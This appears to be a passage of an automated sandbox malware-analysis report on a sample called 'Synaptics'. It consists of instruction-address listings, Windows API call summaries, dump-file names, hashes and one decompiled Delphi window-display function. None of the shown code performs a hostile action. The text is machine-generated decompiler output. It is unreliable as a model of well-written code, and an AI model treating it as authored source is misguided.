                                                                                                                                                                                                                            0x00406080
                                                                                                                                                                                                                            0x00406086
                                                                                                                                                                                                                            0x004060c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406088
                                                                                                                                                                                                                            0x0040608f
                                                                                                                                                                                                                            0x004060a0
                                                                                                                                                                                                                            0x004060a5
                                                                                                                                                                                                                            0x004060ab
                                                                                                                                                                                                                            0x004060b3
                                                                                                                                                                                                                            0x004060b8
                                                                                                                                                                                                                            0x004060c6
                                                                                                                                                                                                                            0x004060c8
                                                                                                                                                                                                                            0x004060ce
                                                                                                                                                                                                                            0x004060d2
                                                                                                                                                                                                                            0x004060d9
                                                                                                                                                                                                                            0x004060da
                                                                                                                                                                                                                            0x00406185
                                                                                                                                                                                                                            0x004060ec
                                                                                                                                                                                                                            0x004060f0
                                                                                                                                                                                                                            0x004060fd
                                                                                                                                                                                                                            0x00406104
                                                                                                                                                                                                                            0x00406105
                                                                                                                                                                                                                            0x0040610e
                                                                                                                                                                                                                            0x0040610f
                                                                                                                                                                                                                            0x00406127
                                                                                                                                                                                                                            0x0040612c
                                                                                                                                                                                                                            0x0040612f
                                                                                                                                                                                                                            0x00406134
                                                                                                                                                                                                                            0x0040613a
                                                                                                                                                                                                                            0x0040613b
                                                                                                                                                                                                                            0x0040614b
                                                                                                                                                                                                                            0x0040614d
                                                                                                                                                                                                                            0x0040615d
                                                                                                                                                                                                                            0x00406164
                                                                                                                                                                                                                            0x0040616e
                                                                                                                                                                                                                            0x0040616f
                                                                                                                                                                                                                            0x00406174
                                                                                                                                                                                                                            0x0040617a
                                                                                                                                                                                                                            0x0040617b
                                                                                                                                                                                                                            0x00406181
                                                                                                                                                                                                                            0x00406183
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406183
                                                                                                                                                                                                                            0x0040614b
                                                                                                                                                                                                                            0x0040612c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004060fd
                                                                                                                                                                                                                            0x00406191
                                                                                                                                                                                                                            0x00406198
                                                                                                                                                                                                                            0x0040619c
                                                                                                                                                                                                                            0x0040619d
                                                                                                                                                                                                                            0x0040619d
                                                                                                                                                                                                                            0x004060b8
                                                                                                                                                                                                                            0x004060a5
                                                                                                                                                                                                                            0x0040608f
                                                                                                                                                                                                                            0x00406040
                                                                                                                                                                                                                            0x0040604b
                                                                                                                                                                                                                            0x0040604f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406051
                                                                                                                                                                                                                            0x00406051
                                                                                                                                                                                                                            0x0040605c
                                                                                                                                                                                                                            0x00406060
                                                                                                                                                                                                                            0x00406065
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406067
                                                                                                                                                                                                                            0x0040606a
                                                                                                                                                                                                                            0x00406071
                                                                                                                                                                                                                            0x00406075
                                                                                                                                                                                                                            0x00406076
                                                                                                                                                                                                                            0x00406076
                                                                                                                                                                                                                            0x00406065
                                                                                                                                                                                                                            0x0040604f
                                                                                                                                                                                                                            0x004061a2
                                                                                                                                                                                                                            0x004061ab

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278), ref: 0040613B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                            • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045695C Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x456ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x49de28; // 0x422f40
					E00406A70(_t294,  &_v12);
					E0040D144(_v12, 1);
					E00404378();
				}
				_t149 =  *0x49ebb8; // 0x21e1714
				E0045B100(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x456ea9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x456db0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x49ebbc; // 0x21e1320
						_t127 = _t160 + 0x6c; // 0x0
						__eflags =  *_t127 - _v8;
						if( *_t127 == _v8) {
							__eflags = 0;
							E00455B08(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00441704(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00441704(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00451750(E00441704(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00441704(_v8), 0);
								} else {
									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043EC5C(_v8);
						}
					} else {
						_push(_t372);
						_push(0x456a14);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004581F4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004581E8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x49ebb8; // 0x21e1714
								_t31 = _t241 + 0x44; // 0x21e2354
								_t305 = E0043A980( *_t31) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x49ebb8; // 0x21e1714
								_t34 = _t245 + 0x44; // 0x21e2354
								_t248 = E0043A9C4( *_t34) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00454DB8(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00458224() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00458218() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x49ebb8; // 0x21e1714
										_t82 = _t262 + 0x44; // 0x21e2354
										_t311 = E0043A980( *_t82) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x49ebb8; // 0x21e1714
										_t85 = _t266 + 0x44; // 0x21e2354
										_t269 = E0043A9C4( *_t85) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x49ebb8; // 0x21e1714
								_t52 = _t270 + 0x44; // 0x21e2354
								_t370 =  *_t52;
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44ff0c; // 0x44ff58
									_t290 = E00403D78( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004581F4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004581E8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t59 = _t370 + 0x48; // 0x115
									_t317 =  *_t59 -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t62 = _t370 + 0x40; // 0xf6
									_t314 = _t318 +  *_t62;
									_t63 = _t370 + 0x4c; // 0x17d
									_t286 =  *_t63 -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t66 = _t370 + 0x44; // 0x72
									_t278 = _t287 +  *_t66;
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00454DB8(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
								E0043B1DC();
							} else {
								_t231 = E00441704(_v8);
								_t232 =  *0x49ebb8; // 0x21e1714
								_t105 = _t232 + 0x44; // 0x21e2354
								_t106 =  *_t105 + 0x254; // 0x0
								SendMessageA( *_t106, 0x223, _t231, 0);
								ShowWindow(E00441704(_v8), 3);
							}
							_t226 =  *0x49ebb8; // 0x21e1714
							_t119 = _t226 + 0x44; // 0x21e2354
							_t120 =  *_t119 + 0x254; // 0x0
							SendMessageA( *_t120, 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x456eb0);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                                                                                                                                                                                                            0x0045695d
                                                                                                                                                                                                                            0x0045695f
                                                                                                                                                                                                                            0x00456967
                                                                                                                                                                                                                            0x0045696a
                                                                                                                                                                                                                            0x0045696f
                                                                                                                                                                                                                            0x00456970
                                                                                                                                                                                                                            0x00456975
                                                                                                                                                                                                                            0x00456978
                                                                                                                                                                                                                            0x00456982
                                                                                                                                                                                                                            0x00456993
                                                                                                                                                                                                                            0x00456998
                                                                                                                                                                                                                            0x004569a7
                                                                                                                                                                                                                            0x004569ac
                                                                                                                                                                                                                            0x004569ac
                                                                                                                                                                                                                            0x004569b1
                                                                                                                                                                                                                            0x004569b6
                                                                                                                                                                                                                            0x004569be
                                                                                                                                                                                                                            0x004569c7
                                                                                                                                                                                                                            0x004569c8
                                                                                                                                                                                                                            0x004569cd
                                                                                                                                                                                                                            0x004569d0
                                                                                                                                                                                                                            0x004569da
                                                                                                                                                                                                                            0x004569e0
                                                                                                                                                                                                                            0x004569e3
                                                                                                                                                                                                                            0x004569ea
                                                                                                                                                                                                                            0x00456d8e
                                                                                                                                                                                                                            0x00456d8f
                                                                                                                                                                                                                            0x00456d94
                                                                                                                                                                                                                            0x00456d97
                                                                                                                                                                                                                            0x00456da1
                                                                                                                                                                                                                            0x00456dab
                                                                                                                                                                                                                            0x00456dc7
                                                                                                                                                                                                                            0x00456dcc
                                                                                                                                                                                                                            0x00456dcf
                                                                                                                                                                                                                            0x00456dd2
                                                                                                                                                                                                                            0x00456dd4
                                                                                                                                                                                                                            0x00456dd9
                                                                                                                                                                                                                            0x00456dd9
                                                                                                                                                                                                                            0x00456dde
                                                                                                                                                                                                                            0x00456de1
                                                                                                                                                                                                                            0x00456de8
                                                                                                                                                                                                                            0x00456df7
                                                                                                                                                                                                                            0x00456dfa
                                                                                                                                                                                                                            0x00456e01
                                                                                                                                                                                                                            0x00456e22
                                                                                                                                                                                                                            0x00456e27
                                                                                                                                                                                                                            0x00456e2e
                                                                                                                                                                                                                            0x00456e33
                                                                                                                                                                                                                            0x00456e35
                                                                                                                                                                                                                            0x00456e40
                                                                                                                                                                                                                            0x00456e45
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e58
                                                                                                                                                                                                                            0x00456e5a
                                                                                                                                                                                                                            0x00456e8c
                                                                                                                                                                                                                            0x00456e5c
                                                                                                                                                                                                                            0x00456e74
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e03
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456dea
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x004569f0
                                                                                                                                                                                                                            0x004569f2
                                                                                                                                                                                                                            0x004569f3
                                                                                                                                                                                                                            0x004569f8
                                                                                                                                                                                                                            0x004569fb
                                                                                                                                                                                                                            0x00456a05
                                                                                                                                                                                                                            0x00456a0f
                                                                                                                                                                                                                            0x00456a35
                                                                                                                                                                                                                            0x00456a61
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aad
                                                                                                                                                                                                                            0x00456aaf
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac4
                                                                                                                                                                                                                            0x00456ac6
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a68
                                                                                                                                                                                                                            0x00456a75
                                                                                                                                                                                                                            0x00456a78
                                                                                                                                                                                                                            0x00456a7a
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7f
                                                                                                                                                                                                                            0x00456a84
                                                                                                                                                                                                                            0x00456a8f
                                                                                                                                                                                                                            0x00456a92
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456acd
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456ad3
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ae5
                                                                                                                                                                                                                            0x00456aee
                                                                                                                                                                                                                            0x00456afb
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b0e
                                                                                                                                                                                                                            0x00456b11
                                                                                                                                                                                                                            0x00456b1c
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456bf3
                                                                                                                                                                                                                            0x00456bf5
                                                                                                                                                                                                                            0x00456bfb
                                                                                                                                                                                                                            0x00456bfe
                                                                                                                                                                                                                            0x00456c05
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c51
                                                                                                                                                                                                                            0x00456c53
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c68
                                                                                                                                                                                                                            0x00456c6a
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c0c
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c1c
                                                                                                                                                                                                                            0x00456c1e
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c23
                                                                                                                                                                                                                            0x00456c28
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c36
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c6f
                                                                                                                                                                                                                            0x00456c71
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c75
                                                                                                                                                                                                                            0x00456c77
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b2a
                                                                                                                                                                                                                            0x00456b2a
                                                                                                                                                                                                                            0x00456b2d
                                                                                                                                                                                                                            0x00456b30
                                                                                                                                                                                                                            0x00456b37
                                                                                                                                                                                                                            0x00456b3f
                                                                                                                                                                                                                            0x00456b45
                                                                                                                                                                                                                            0x00456b4a
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b54
                                                                                                                                                                                                                            0x00456b56
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b92
                                                                                                                                                                                                                            0x00456b94
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba9
                                                                                                                                                                                                                            0x00456bab
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456b58
                                                                                                                                                                                                                            0x00456b58
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b61
                                                                                                                                                                                                                            0x00456b63
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b68
                                                                                                                                                                                                                            0x00456b68
                                                                                                                                                                                                                            0x00456b6b
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b74
                                                                                                                                                                                                                            0x00456b76
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456bb0
                                                                                                                                                                                                                            0x00456bb2
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb6
                                                                                                                                                                                                                            0x00456bb8
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bca
                                                                                                                                                                                                                            0x00456bd3
                                                                                                                                                                                                                            0x00456bd9
                                                                                                                                                                                                                            0x00456bdc
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456c9b
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x00456d82
                                                                                                                                                                                                                            0x00456cb2
                                                                                                                                                                                                                            0x00456cbc
                                                                                                                                                                                                                            0x00456d0f
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d38
                                                                                                                                                                                                                            0x00456d40
                                                                                                                                                                                                                            0x00456cbe
                                                                                                                                                                                                                            0x00456cc3
                                                                                                                                                                                                                            0x00456cce
                                                                                                                                                                                                                            0x00456cd3
                                                                                                                                                                                                                            0x00456cd6
                                                                                                                                                                                                                            0x00456cdd
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456d4e
                                                                                                                                                                                                                            0x00456d53
                                                                                                                                                                                                                            0x00456d56
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x004569ea
                                                                                                                                                                                                                            0x00456e93
                                                                                                                                                                                                                            0x00456e96
                                                                                                                                                                                                                            0x00456e99
                                                                                                                                                                                                                            0x00456e9e
                                                                                                                                                                                                                            0x00456ea1
                                                                                                                                                                                                                            0x00456ea8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00456CDD
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LoadMessageSendString
                                                                                                                                                                                                                            • String ID: @/B
                                                                                                                                                                                                                            • API String ID: 1946433856-85281795
                                                                                                                                                                                                                            • Opcode ID: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
                                                                                                                                                                                                                            • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
